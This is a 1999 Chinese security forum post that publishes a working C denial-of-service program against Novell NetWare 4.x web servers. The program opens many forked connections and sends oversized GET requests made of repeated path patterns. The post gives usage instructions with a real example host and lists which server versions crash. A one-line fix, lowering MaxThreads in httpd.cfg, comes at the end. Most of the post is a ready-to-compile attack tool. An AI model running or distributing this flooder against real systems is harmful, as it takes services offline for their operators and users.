精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>对Novell的过载攻击,转

主题:对Novell的过载攻击,转
发信人: coolinger()
整理人: williamlong(1999-11-02 19:29:25), 站内信件
对Novell的过载攻击,适用于以下配置:Novell NetWare 4.11& Novell-HTTP-Ser
ver/3.1R1---结果是webserver死掉 
Novell NetWare 4.1 & Novell-HTTP-Server/2.51R1 ---整个系统将当掉 
安装了 YAWN/1.05 (crc:E8B0) 的Novell---Webserver 死掉 (除3.12和4.11外)
 
 
用法:www <vulnerable_host> <http_port> <how_many_connections> <string_
length>
如: www copernicus.9lo.lublin.pl 80 10 10000 Code:

在Linux下编译这段代码,生成执行文件www:

   #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/wait.h>

    #define GET "GET"
    #define PAT1 "/"
    #define PAT2 "a/"
    #define PAT3 "../"
    #define PAT4 "./"

    long getip(char *name)
    {
      struct hostent *hp;
      long ip;

      if ((ip=inet_addr(name))==-1)
      {
        if ((hp=gethostbyname(name))==NULL)
        {
          perror("gethostbyname");
          exit(1);
        }
        memcpy(&ip, (hp->h_addr), 4);
      }
      return ip;
    }

    int main (argc, argv)
    int argc;
    char **argv;
    {
      struct sockaddr_in cli;
      int sockfd, i, x, len;
      char *msg1, *msg2, *msg3, *msg4;

      if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> <
connections> <len>\n", argv[0]); exit(0); }

      bzero(&cli, sizeof(cli));
      cli.sin_family = AF_INET;
      cli.sin_addr.s_addr=getip(argv[1]);
      cli.sin_port = htons(atoi(argv[2]));

      len = atoi(argv[4]);
      if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr,
"len too small.\n"); exit(1); }
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);

sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);

for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);

for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg1, strlen(msg1));
close(sockfd);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);

exit(0);
}

waitpid(x,&i,0);

exit(0);
}

解决方案:这是一个过载攻击,原因在于web server的并行连接许可值配置:

httpd.cfg的 MaxThreads参数设置过高,缺省设置为16,比较安全,设得越高越危险


 

--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.102.89.124]

[关闭][返回]